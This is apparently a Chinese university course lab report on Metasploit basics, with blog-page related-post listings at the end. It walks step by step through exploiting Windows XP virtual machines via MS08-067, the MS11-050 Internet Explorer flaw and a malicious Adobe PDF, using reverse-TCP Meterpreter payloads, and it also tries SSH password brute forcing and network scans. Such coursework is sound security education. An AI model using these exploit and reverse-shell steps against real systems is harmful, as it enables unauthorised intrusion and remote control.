20145238荆玉茗-《网络攻防》-MSF基础应用

实践过程

MS08_067漏洞渗透攻击实践(主动攻击)

实验工具:

  • kali&windows xp
  • 将xp的网络设为NAT模式,再重新分配其ip地址与kali在同一网段,可以看到两台虚拟机可以ping通。

MS08_067远程漏洞攻击

  • 打开msf监听
  • 查找关于ms08_067的渗透模块

  • 使用它有的这个exploit/windows/smb/ms08_067_netapi
  • 显示攻击载荷,可以用这个shell_bind_tcp

  • show targets看一下可以被攻击的靶机的操作系统
  • 使用set payload generic/shell_reverse_tcp设置攻击有效载荷。
  • 查看当前设置,要将RHOST设置为XP的IP;将LHOST设为kali的IP
    set LHOST "kali Ip" set RHOST "Win xp Ip"

  • 之后exploit可以获取其shell

回到ms08_067_netapi模块界面

  • 这次将payload设为meterpreterset payload windows/meterpreter/reverse_tcp
  • show options
  • exploit
    同样可以获取靶机权限

IE浏览器渗透攻击——MS11050安全漏洞(针对浏览器)

实验工具:

  • kali&windows xp(使用浏览器为IE7)
  • xp的ip地址为192.168.228.130

实验步骤:

  • 在kali中开启msfconsole
  • 进入该漏洞use windows/browser/ms11_050_mshtml_cobjectelement
  • 可查看信息info以及目标浏览器targets

  • 设置meterpreter载荷set payload windows/meterpreter/reverse_tcp
  • show options(将LHOST设为kali的IP、set LPORT xxx set URIPATH xxx)

  • 完成exploitXP访问底下的网址

  • 此时kali中session已创建

  • 使用命令sessions -i 1开始连接,并成功得到shell

Adobe阅读器渗透攻击

实验工具:

  • kali&Win xp attacker
  • 均设为NAT模式,确保能够ping通。
  • 打开kali中的隐藏文件

实验步骤:

  • 在kali终端中开启msfconsole
  • 进入该漏洞use exploit/windows/fileformat/adobe_cooltype_sing
  • 设置攻击有效载荷set payload windows/meterpreter/reverse_tcp
  • show options

set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx

  • 设置相关信息

  • 生成其pdf,将pdf拷贝到靶机中

  • 使用命令exploit开始攻击,在xp中打开pdf。
    此时kali中可以看见
    已成功夺权

  • 看看靶机里的tcp连接

应用辅助模块

  • 使用show auxiliary查看辅助模块

  • 我首先选择了这个漏洞,百度之后是进行远程ssl账号口令的破解。
    首先使用use auxiliary/scanner/ssh/ssh_login

  • 查看其配置信息(还配置了pass.txt,和user.txt)

  • 但是run之后一直出错

(百度说Windows下msf安装好以后,直接把生成好的pass.txt和user.txt放到X:\Program Files\Metasploit\Framework3\msf3\目录下,直接放到c:\下面不行 只能放到msf3目录下,我以为直接把生成的文件拷贝过去就行,首先我没找到生成的文件...然后我把ip改为kali的,还是报错)

  • 还是看一下scanner/http/ssl

  • 我们更改了目标主机设为同一网段的,再次扫描...未果
    又更改了其线程...仍未果

  • 还是做最容易的nmap扫面,看看其开放端口吧

  • 还是不太甘心,又做了一下arp_sweep
    填好其设置信息以后使用run 开始扫描。可看到连接情况。

实验后回答问题

(1)用自己的话解释什么是exploit,payload,encode.

  • exploit:就是发起渗透攻击,当你可以获得靶机shell或者做一些夺权的准备之后的最后一个run。
  • payload就是我们在做渗透攻击中用到的shellcode,可以破坏程序正常运行的代码。
  • encode伪装病毒的一种手段——编码

实验总结与体会

通过本次实验,我首先掌握了通过msf如何查看各种各样的安全漏洞,再通过一个漏洞的分类进行攻击。大致步骤为:

  • 确定你想尝试的漏洞show auxiliary
  • 搜索该漏洞的模块search xxx(可以看到分别表示的模块类型、目标平台、目标服务、模块名字)
  • show payloads可查看攻击载荷的类型,选择运行后门
  • show options查看配设渗透攻击所需要的配置选项。yes为必须配设的通过set xxx xxxx来配设
  • 重要的一点是这些漏洞都非常具有针对性、所以一定要show targets来看看相应的受害者是啥
  • 配置完各个选项以后再show options确认一下
  • 之后就可以exploit发起进攻。

本次实验难度方面不是特别大,主要考察你虚拟机能不能行,哎,一直在百分之93的状态下做完了实验,最后也分不清0 8 和o 了。。。

20145238-荆玉茗《网络对抗技术》MSF基础应用的更多相关文章

  1. #20145238荆玉茗《网络对抗》-逆向及Bof进阶实践

    20145238荆玉茗<网络对抗>-逆向及Bof进阶实践 实践目的:注入shellcode 准备一段shellcode代码 Shellcode实际是一段代码(也可以是填充数据),是用来发送 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  5. 20155305《网络对抗》MSF基础应用

    20155305<网络对抗>MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108 靶机2:Window ...

  6. 20155311《网络对抗》MSF基础应用

    20155311<网络对抗>MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.136.129 靶机2:Wind ...

  7. 20145219《网络对抗》MSF基础应用

    20145219<网络对抗>MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. payl ...

  8. 20145229吴姗珊《网络对抗》MSF基础应用

    20145229吴姗珊<网络对抗>MSF基础应用 试验过程及基础知识 实验完成问题回答 用自己的话解释什么是exploit,payload,encode. exploit:通过一个漏洞对程 ...

  9. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  10. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

随机推荐

  1. C# Winform软件多语言(汉语、英语。。。)界面的切换,低耦合

    Winform软件多语言切换,个人见解,降低软件对语言展示的耦合度. 1.设计图(自己瞎画的呵呵) 2.做的小demo,界面如下 3.下面是代码展示部分 1)Form1代码展示 namespace W ...

  2. redis(1)简介

    一.nosql简介 RDBMS(关系型数据库)提供的结构化编程,让数据建模以及应用程序编程变得非常简单,带来了非常高的经济效益,并且学习成本也比较低.但在当今数据大爆炸时代,每时每刻都会海量的数据产生 ...

  3. 使用Calendar加一天,减一天

    public class Test { public static void main(String[] args) { Calendar c=Calendar.getInstance(); Simp ...

  4. (转) AJAX POST&跨域 解决方案 - CORS

    跨域是我在日常面试中经常会问到的问题,这词在前端界出现的频率不低,主要原因还是由于安全限制(同源策略, 即JavaScript或Cookie只能访问同域下的内容),因为我们在日常的项目开发时会不可避免 ...

  5. ArcGIS DataStore手册——常见问题篇

    第三章:ArcGIS DataStore常见问题处理 1.DataStore使用的数据库是什么? 从安装后的内容和配置完DataStore中Server Manager中的信息来看,DataStore ...

  6. C#获取apk版本信息

    获取很多人都会问我为什么要写这个博客,原因很简单,这次研发apk版本信息的时候网上查了很多的资料都没有这方面的信息,因此这次功能完了想写下方法,如果以后博友们遇到了可以直接copy,不用花很多的时间, ...

  7. png的故事:隔行扫描算法

    转载自AlloyTeam:http://www.alloyteam.com/2017/06/the-story-of-png-deinterlacing-algorithm/ 前言 前文已经讲解过如何 ...

  8. Dapper批量添加

    Public void Add() {  List<PPQuery> lists = GetDataByFile(tempFilePath); private static readonl ...

  9. Thinkphp中在本地测试很好,在服务器上出错,有可能是因为debug缓存的问题

    define('APP_DEBUG',false); 这个设置从true改为false后,一定要清空缓存,否则会出错.

  10. 【Leetcode】【Medium】Linked List Cycle II

    Given a linked list, return the node where the cycle begins. If there is no cycle, return null. 解题: ...